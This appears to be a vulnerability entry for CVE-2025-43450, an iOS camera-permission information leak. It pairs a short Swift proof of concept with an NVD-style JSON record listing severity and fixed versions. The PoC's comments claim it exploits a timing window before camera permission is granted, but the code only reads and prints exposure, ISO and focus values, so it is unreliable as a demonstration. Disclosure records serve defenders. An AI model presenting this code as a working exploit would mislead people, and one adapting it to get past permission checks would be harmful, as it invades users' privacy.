CVE-2025-43450

// CVE-2025-43450 PoC - iOS Camera View Information Leakage // This PoC demonstrates the timing issue in camera permission check import AVFoundation; import UIKit; class CVE202543450PoC: UIViewController { private var captureSession: AVCaptureSession? private var previewLayer: AVCaptureVideoPreviewLayer? override func viewDidLoad() { super.viewDidLoad() setupCamera() } private func setupCamera() { // Attempt to access camera before permission is granted // This exploits the timing window in permission check let device = AVCaptureDevice.default(for: .video) if device != nil { // Check if we have permission let status = AVCaptureDevice.authorizationStatus(for: .video) if status == .notDetermined { // Permission not yet granted - timing window exists // Application can potentially access camera state logCameraState(device: device!) } } } private func logCameraState(device: AVCaptureDevice) { // Log camera state information // In vulnerable versions, this could leak view information print("Camera exposure: \(device.exposureTargetBias)") print("Camera ISO: \(device.iso)") print("Camera focus: \(device.focusPosition)") // These values can reveal information about the camera view } } // Mitigation: Update to iOS 18.7.2+ or iPadOS 18.7.2+ or iOS 26.1+/iPadOS 26.1+ // Apple has addressed this logic issue with improved permission checks

{"cve": {"id": "CVE-2025-43450", "sourceIdentifier": "[email protected]", "published": "2025-11-04T02:15:50.747", "lastModified": "2025-12-17T21:16:05.280", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A logic issue was addressed with improved checks. This issue is fixed in iOS 18.7.2 and iPadOS 18.7.2, iOS 26.1 and iPadOS 26.1. An app may be able to learn information about the current camera view before being granted camera access."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "6D51AEDC-9086-4010-B3BF-C652D65D09C8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "3981A7BE-BC98-4C6F-AE38-D68839368925"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125632", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125633", "source": "[email protected]"}]}}